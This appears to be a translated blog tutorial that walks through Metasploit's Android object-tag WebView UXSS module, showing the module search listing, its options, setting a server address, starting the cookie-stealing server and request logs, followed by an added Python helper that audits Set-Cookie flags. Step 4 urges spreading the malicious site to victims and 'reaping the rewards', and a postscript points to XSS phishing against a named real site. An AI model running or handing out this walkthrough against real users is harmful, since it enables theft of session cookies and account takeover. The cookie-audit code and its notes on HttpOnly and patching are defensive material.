Using an Android UXSS vulnerability to carry out an XSS attack


A hacker's approach is to first gather information, locate a vulnerability, and then use a method suited to that particular vulnerability to compromise you. Below, metasploit is used to simulate a cross-site scripting attack (hacking my own phone).

1. Gather information

msf > search android

Matching Modules
================

   Name                                                       Disclosure Date  Rank       Description
   ----                                                       ---------------  ----       -----------
   auxiliary/admin/android/google_play_store_uxss_xframe_rce                   normal     Android Browser RCE Through Google Play Store XFO
   auxiliary/gather/android_browser_new_tab_cookie_theft                       normal     Android Browser "Open in New Tab" Cookie Theft
   auxiliary/gather/android_htmlfileprovider                                   normal     Android Content Provider File Disclosure
   auxiliary/gather/android_object_tag_webview_uxss           2014-10-04       normal     Android Open Source Platform (AOSP) Browser UXSS
   auxiliary/gather/android_stock_browser_uxss                                 normal     Android Open Source Platform (AOSP) Browser UXSS
   auxiliary/scanner/sip/sipdroid_ext_enum                                     normal     SIPDroid Extension Grabber
   exploit/android/browser/samsung_knox_smdm_url              2014-11-12       normal     Samsung Galaxy KNOX Android Browser RCE
   exploit/android/browser/webview_addjavascriptinterface     2012-12-21       normal     Android Browser and WebView addJavascriptInterface Code Execution
   exploit/android/fileformat/adobe_reader_pdf_js_interface   2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   exploit/android/local/futex_requeue                        2014-05-03       excellent  Android 'Towelroot' Futex Requeue Kernel Exploit
   exploit/multi/handler                                                       manual     Generic Payload Handler
   payload/android/meterpreter/reverse_http                                    normal     Android Meterpreter, Dalvik Reverse HTTP Stager
   payload/android/meterpreter/reverse_https                                   normal     Android Meterpreter, Dalvik Reverse HTTPS Stager
   payload/android/meterpreter/reverse_tcp                                     normal     Android Meterpreter, Dalvik Reverse TCP Stager
   payload/android/shell/reverse_http                                          normal     Command Shell, Dalvik Reverse HTTP Stager
   payload/android/shell/reverse_https                                         normal     Command Shell, Dalvik Reverse HTTPS Stager
   payload/android/shell/reverse_tcp                                           normal     Command Shell, Dalvik Reverse TCP Stager

As you can see, there are many exploitable Android vulnerabilities. Here I chose a UXSS (universal cross-site scripting) vulnerability; searching for it shows the vulnerability's detailed description.

Roughly speaking, this vulnerability means that if the attacker succeeds, the cookies of your pages will be obtained from your browser.

2. Next, use this vulnerability and view the module's options.

msf > use auxiliary/gather/android_object_tag_webview_uxss
msf auxiliary(android_object_tag_webview_uxss) > show options

Module options (auxiliary/gather/android_object_tag_webview_uxss):

   Name         Current Setting     Required  Description
   ----         ---------------     --------  -----------
   CUSTOM_JS                        no        A string of javascript to execute in the context of the target URLs.
   REMOTE_JS                        no        A URL to inject into a script tag in the context of the target URLs.
   SRVHOST      0.0.0.0             yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      8080                yes       The local port to listen on.
   SSL          false               no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGET_URLS  http://example.com  yes       The comma-separated list of URLs to steal.
   URIPATH                          no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  

From the listing above you can see that the required fields are SRVHOST/SRVPORT/TARGET_URLS. This is the key part. In this step, what you need to do is set up your own site and embed the script that obtains the cookie and sends it back!

Here I keep the default values for everything except SRVHOST, for demonstration purposes only. (Later I will give a concrete example of how someone else's XSS is done.)

msf auxiliary(android_object_tag_webview_uxss) > set SRVHOST 192.168.1.106
SRVHOST => 192.168.1.106

3. Assuming your script and site are already set up, next enter "exploit"; once the server has started you are basically done.

msf auxiliary(android_object_tag_webview_uxss) > exploit 
[*] Auxiliary module execution completed
msf auxiliary(android_object_tag_webview_uxss) > 
[*] Using URL: http://192.168.1.106:8080/ORvS7Li6X
[*] Server started.

4. Next, you need to find a way to spread your site around, then just sit back and reap the rewards.

[*] 192.168.1.105    android_object_tag_webview_uxss - Request 'GET /ORvS7Li6X'
[*] 192.168.1.105    android_object_tag_webview_uxss - Sending initial HTML ...
[*] 192.168.1.105    android_object_tag_webview_uxss - Request 'GET /ORvS7Li6X'
[*] 192.168.1.105    android_object_tag_webview_uxss - Sending initial HTML ...
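The module above works by running JavaScript inside the victim page's origin and reading its cookies, so on the defending side the first question is which of a site's cookies are actually readable from script. The following helper is an added example written for this post (it is not part of the original article or of Metasploit): it parses a response's Set-Cookie headers and reports cookies missing HttpOnly, Secure, or SameSite. The sample headers are constructed for the example.

```python
"""Audit Set-Cookie headers for flags that limit what an in-origin script can read.

Added example, not code from the original post or from Metasploit.
A UXSS lets attacker JavaScript run in the target page's origin, so any cookie
readable via document.cookie can be sent to the attacker. Cookies marked HttpOnly
are not readable from script; Secure and SameSite reduce exposure further.
The sample headers below are constructed for this example.
"""
from dataclasses import dataclass, field


@dataclass
class CookieFinding:
    name: str
    missing: list = field(default_factory=list)


def parse_set_cookie(header_value: str) -> tuple[str, dict]:
    """Split one Set-Cookie header value into (cookie name, attributes).

    Attribute names are lower-cased; flag attributes without a value
    (HttpOnly, Secure) map to True, valued ones (Path, SameSite) to their value.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        if "=" in part:
            key, value = part.split("=", 1)
            attrs[key.strip().lower()] = value.strip()
        else:
            attrs[part.lower()] = True
    return name, attrs


def audit_set_cookie(headers: list[str]) -> list[CookieFinding]:
    """Return one finding per cookie that lacks HttpOnly, Secure, or SameSite."""
    findings = []
    for header in headers:
        name, attrs = parse_set_cookie(header)
        missing = []
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if "secure" not in attrs:
            missing.append("Secure")
        if "samesite" not in attrs:
            missing.append("SameSite")
        if missing:
            findings.append(CookieFinding(name, missing))
    return findings


# Constructed sample: one well-protected session cookie and two weaker ones.
SAMPLE_HEADERS = [
    "sessionid=abc123; Path=/; HttpOnly; Secure; SameSite=Lax",
    "prefs=dark; Path=/",
    "csrftoken=xyz; Path=/; Secure",
]

if __name__ == "__main__":
    for finding in audit_set_cookie(SAMPLE_HEADERS):
        print(f"{finding.name}: missing {', '.join(finding.missing)}")
```

HttpOnly only prevents the injected script from reading the cookie value; script running in the origin can still issue requests that carry the cookie automatically, so the flag limits theft of the token rather than every abuse of the session. The actual fix for the bug the module targets is an updated browser or WebView; the cookie audit is the compensating check for sites that their users visit from older devices.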

Postscript: this post does not go into depth on how to design and build the script; for a concrete approach you can refer to the following article.

Real-world use of an XSS vulnerability on me.jd.com for basic-authentication phishing